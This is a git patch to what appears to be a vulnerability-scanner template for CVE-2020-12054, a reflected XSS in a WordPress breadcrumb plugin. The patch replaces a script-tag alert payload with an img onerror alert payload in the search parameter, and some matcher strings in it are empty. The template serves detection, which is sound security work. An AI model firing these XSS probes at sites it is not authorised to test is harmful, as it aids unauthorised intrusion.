From 414883f719c9ac4d5a50900a11a6b5081cd0506e Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 23:55:15 +0530 Subject: [PATCH] Update CVE-2020-12054.yaml --- cves/2020/CVE-2020-12054.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-12054.yaml b/cves/2020/CVE-2020-12054.yaml index 2ab2fab4c9..60bcb223fb 100644 --- a/cves/2020/CVE-2020-12054.yaml +++ b/cves/2020/CVE-2020-12054.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" - "catch-breadcrumb" part: body condition: and @@ -29,4 +29,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file